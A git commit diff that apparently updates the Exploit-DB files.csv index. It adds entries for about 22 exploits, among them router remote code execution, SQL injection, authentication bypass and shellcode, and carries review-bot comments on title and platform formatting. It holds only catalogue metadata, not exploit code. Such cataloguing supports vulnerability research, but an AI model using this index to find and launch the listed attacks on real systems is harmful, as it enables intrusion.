DB: 2017-10-04

22 new exploits

All browsers - Crash
Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)
Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed _glyf_ Table (win32k!fsc_CalcGrayRow)
Microsoft Windows Kernel - win32k.sys .TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)
Microsoft Windows Kernel - .win32k.sys TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)

NoMachine 5.3.9 - Privilege Escalation

Microsoft Word 2007 (x86) - Information Disclosure

Apple Mac OS X + Safari - Local Javascript Quarantine Bypass

Australian Education App - Remote Code Execution

CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution

Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution

UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution

Web interface for DNSmasq / Mikrotik - SQL Injection
Web Interface for DNSmasq / Mikrotik - SQL Injection

Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion

Uniview NVR - Password Disclosure

Nuevomailer < 6.0 - SQL Injection

IBM Informix Dynamic Server - Code Injection / Remote Code Execution

WordPress Plugin Sabai Discuss - Cross-Site Scripting

Tilde CMS 1.01 - Multiple Vulnerabilities

VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass

JoySale 2.2.1 - Arbitrary File Upload
AirMaster 3000M - Multiple Vulnerabilities
RPi Cam Control < 6.3.14 - Remote Command Execution

iTech Movie Script 7.51 - SQL Injection

CMS Web-Gooroo < 1.141 - Multiple Vulnerabilities

PHP-SecureArea < 2.7 - Multiple Vulnerabilities

Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass

Fiberhome AN5506-04-F - Command Injection
This commit is contained in:
Offensive Security 2017-10-04 05:01:32 +00:00
parent ecfeb57577
commit 4df0e06052
23 changed files with 1777 additions and 4 deletions


@ -1527,7 +1527,7 @@ id,file,description,date,author,platform,type,port
12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0 12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0
12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0 12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0 12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0
12491,platforms/multiple/dos/12491.html,"All browsers - Crash",2010-05-03,"Inj3ct0r Team",multiple,dos,0 12491,platforms/multiple/dos/12491.html,"All browsers - Crash",2010-05-03,Inj3ct0r,multiple,dos,0
12492,platforms/windows/dos/12492.html,"Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)",2010-05-03,Dr_IDE,windows,dos,0 12492,platforms/windows/dos/12492.html,"Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)",2010-05-03,Dr_IDE,windows,dos,0
12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos,0 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos,0
12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,windows,dos,0 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,windows,dos,0
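Review bot: the only change in this hunk is the author field of 12491 ("Inj3ct0r Team" becomes Inj3ct0r), yet the commit message lists "All browsers - Crash" in the same block as the 22 new exploits; consider marking author/title normalizations separately in the message so readers do not look for a new file under that title.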
@ -5674,8 +5674,8 @@ id,file,description,date,author,platform,type,port
42741,platforms/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42741,platforms/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0 42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - win32k.sys .TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0
42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed _glyf_ Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0 42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - .win32k.sys TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0
42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0 42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0
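Review bot: the renamed titles for 42744 and 42746 carry stray dots and lose the " - " separator the rest of this file uses: 42744 now reads "win32k.sys .TTF Font Processing" and 42746 reads ".win32k.sys TTF Font Processing Out-of-Bounds Read". Suggest "Microsoft Windows Kernel - win32k.sys TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' Table (win32k!bGeneratePath)" and "Microsoft Windows Kernel - win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)", which also capitalizes "Table" consistently.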
@ -9247,6 +9247,7 @@ id,file,description,date,author,platform,type,port
42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0 42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0 42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0 42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
42460,platforms/osx/local/42460.py,"NoMachine 5.3.9 - Privilege Escalation",2017-08-09,"Daniele Linguaglossa",osx,local,0
42521,platforms/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local,0 42521,platforms/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local,0
42536,platforms/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0 42536,platforms/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
42537,platforms/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution",2017-08-21,"Daniele Votta",windows,local,0 42537,platforms/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution",2017-08-21,"Daniele Votta",windows,local,0
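Review bot: the new 42460 entry uses platform osx (platforms/osx/local) while the 42454 context line three rows above uses macos for the same operating system; pick one platform value for new macOS entries so searches by platform return both.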
@ -9271,8 +9272,10 @@ id,file,description,date,author,platform,type,port
42890,platforms/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local,0 42890,platforms/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local,0
42918,platforms/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local,0 42918,platforms/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local,0
42921,platforms/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Buffer Overflow",2017-09-29,"Touhid M.Shaikh",windows,local,0 42921,platforms/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Buffer Overflow",2017-09-29,"Touhid M.Shaikh",windows,local,0
42930,platforms/windows/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",windows,local,0
42936,platforms/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Privilege Escalation",2017-10-02,Sysdream,linux,local,0 42936,platforms/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Privilege Escalation",2017-10-02,Sysdream,linux,local,0
42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0 42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0
42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
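Review bot: the 42948 title spells the language "Javascript", whereas the existing 12487 entry earlier in this diff uses "JavaScript"; suggest "Apple Mac OS X + Safari - Local JavaScript Quarantine Bypass" for consistency. Note also that 42948 uses platform osx, alongside the osx/macos split flagged in the previous hunk.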
@ -15817,6 +15820,7 @@ id,file,description,date,author,platform,type,port
42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000 42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000
42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote,0 42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote,0
42288,platforms/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0 42288,platforms/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
42289,platforms/android/remote/42289.txt,"Australian Education App - Remote Code Execution",2017-06-30,intern0t,android,remote,0
42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443 42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443
42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778
42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
@ -15829,6 +15833,7 @@ id,file,description,date,author,platform,type,port
42349,platforms/android/remote/42349.txt,"SKILLS.com.au Industry App - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0 42349,platforms/android/remote/42349.txt,"SKILLS.com.au Industry App - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0
42350,platforms/android/remote/42350.txt,"Virtual Postage (VPA) - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0 42350,platforms/android/remote/42350.txt,"Virtual Postage (VPA) - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0
42354,platforms/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote,0 42354,platforms/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote,0
42355,platforms/hardware/remote/42355.c,"CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution",2017-07-24,oxagast,hardware,remote,0
42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0 42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0
42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0 42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0
42395,platforms/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote,0 42395,platforms/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote,0
@ -15878,8 +15883,10 @@ id,file,description,date,author,platform,type,port
42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858 42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0 42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0
42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0 42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
42891,platforms/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution",2017-09-28,hyp3rlinx,windows,remote,0
42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0 42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0
42938,platforms/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote,0 42938,platforms/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote,0
42949,platforms/linux/remote/42949.txt,"UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution",2017-10-02,agix,linux,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
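Review bot: the new 42949 entry gives the affected version as "UCOPIA Wireless Appliance < 5.1 (Captive Portal)", while the 42936 and 42937 lines added earlier in this commit use "< 5.1.8" for the same product; since these come from different authors the ranges may genuinely differ, but please confirm against the advisory so the two version strings are not an editing slip.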
@ -37297,7 +37304,7 @@ id,file,description,date,author,platform,type,port
39883,platforms/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 39883,platforms/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80 39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80
39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0 39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0
39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0 39817,platforms/php/webapps/39817.php,"Web Interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0 39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0
39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEBlog - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0 39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEBlog - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0
39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0
@ -38265,6 +38272,7 @@ id,file,description,date,author,platform,type,port
41989,platforms/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,php,webapps,0 41989,platforms/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,php,webapps,0
41990,platforms/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,php,webapps,0 41990,platforms/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,php,webapps,0
41997,platforms/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith",php,webapps,0 41997,platforms/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith",php,webapps,0
41998,platforms/hardware/webapps/41998.txt,"Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion",2017-05-02,ReverseBrain,hardware,webapps,0
42003,platforms/php/webapps/42003.txt,"PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload",2017-05-14,"Touhid M.Shaikh",php,webapps,80 42003,platforms/php/webapps/42003.txt,"PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload",2017-05-14,"Touhid M.Shaikh",php,webapps,80
42004,platforms/php/webapps/42004.txt,"Mailcow 0.14 - Cross-Site Request Forgery",2017-05-15,hyp3rlinx,php,webapps,0 42004,platforms/php/webapps/42004.txt,"Mailcow 0.14 - Cross-Site Request Forgery",2017-05-15,hyp3rlinx,php,webapps,0
42005,platforms/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",php,webapps,0 42005,platforms/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",php,webapps,0
@ -38316,10 +38324,12 @@ id,file,description,date,author,platform,type,port
42133,platforms/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",php,webapps,0 42133,platforms/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",php,webapps,0
42143,platforms/php/webapps/42143.txt,"Craft CMS 2.6 - Cross-Site Scripting",2017-06-08,"Ahsan Tahir",php,webapps,0 42143,platforms/php/webapps/42143.txt,"Craft CMS 2.6 - Cross-Site Scripting",2017-06-08,"Ahsan Tahir",php,webapps,0
42149,platforms/linux/webapps/42149.py,"IPFire 2.19 - Remote Code Execution",2017-06-09,0x09AL,linux,webapps,0 42149,platforms/linux/webapps/42149.py,"IPFire 2.19 - Remote Code Execution",2017-06-09,0x09AL,linux,webapps,0
42150,platforms/hardware/webapps/42150.py,"Uniview NVR - Password Disclosure",2017-06-09,B1t,hardware,webapps,0
42151,platforms/php/webapps/42151.txt,"eCom Cart 1.3 - SQL Injection",2017-06-10,"Alperen Eymen Ozcan",php,webapps,0 42151,platforms/php/webapps/42151.txt,"eCom Cart 1.3 - SQL Injection",2017-06-10,"Alperen Eymen Ozcan",php,webapps,0
42153,platforms/windows/webapps/42153.py,"EFS Easy Chat Server 3.1 - Password Disclosure",2017-06-09,"Aitezaz Mohsin",windows,webapps,0 42153,platforms/windows/webapps/42153.py,"EFS Easy Chat Server 3.1 - Password Disclosure",2017-06-09,"Aitezaz Mohsin",windows,webapps,0
42154,platforms/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",windows,webapps,0 42154,platforms/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",windows,webapps,0
42156,platforms/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,php,webapps,0 42156,platforms/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,php,webapps,0
42164,platforms/php/webapps/42164.txt,"Nuevomailer < 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",php,webapps,0
42166,platforms/php/webapps/42166.txt,"WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection",2017-06-03,"Dimitrios Tsagkarakis",php,webapps,0 42166,platforms/php/webapps/42166.txt,"WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection",2017-06-03,"Dimitrios Tsagkarakis",php,webapps,0
42167,platforms/php/webapps/42167.txt,"Real Estate Classifieds Script - SQL Injection",2017-06-12,EziBilisim,php,webapps,0 42167,platforms/php/webapps/42167.txt,"Real Estate Classifieds Script - SQL Injection",2017-06-12,EziBilisim,php,webapps,0
42172,platforms/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",php,webapps,0 42172,platforms/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",php,webapps,0
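Review bot: the new 42164 line, "Nuevomailer < 6.0 - SQL Injection" (2017-06-09, Oleg Boytsev), sits a few rows from the existing 42193 line "nuevoMailer 6.0 - SQL Injection" by the same author on the same date; check whether the two files describe distinct issues, and in either case align the product spelling (Nuevomailer vs nuevoMailer) so both entries match in a search.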
@ -38327,6 +38337,7 @@ id,file,description,date,author,platform,type,port
42178,platforms/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps,0 42178,platforms/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps,0
42184,platforms/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",aspx,webapps,0 42184,platforms/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",aspx,webapps,0
42185,platforms/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,php,webapps,0 42185,platforms/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,php,webapps,0
42187,platforms/linux/webapps/42187.py,"IBM Informix Dynamic Server - Code Injection / Remote Code Execution",2017-06-16,IMgod,linux,webapps,0
42192,platforms/hardware/webapps/42192.sh,"iBall Baton iB-WRA150N - Unauthenticated DNS Change",2017-06-16,"Todor Donev",hardware,webapps,0 42192,platforms/hardware/webapps/42192.sh,"iBall Baton iB-WRA150N - Unauthenticated DNS Change",2017-06-16,"Todor Donev",hardware,webapps,0
42193,platforms/php/webapps/42193.txt,"nuevoMailer 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",php,webapps,0 42193,platforms/php/webapps/42193.txt,"nuevoMailer 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",php,webapps,0
42194,platforms/hardware/webapps/42194.sh,"UTstarcom WA3002G4 - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0 42194,platforms/hardware/webapps/42194.sh,"UTstarcom WA3002G4 - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
@ -38353,6 +38364,7 @@ id,file,description,date,author,platform,type,port
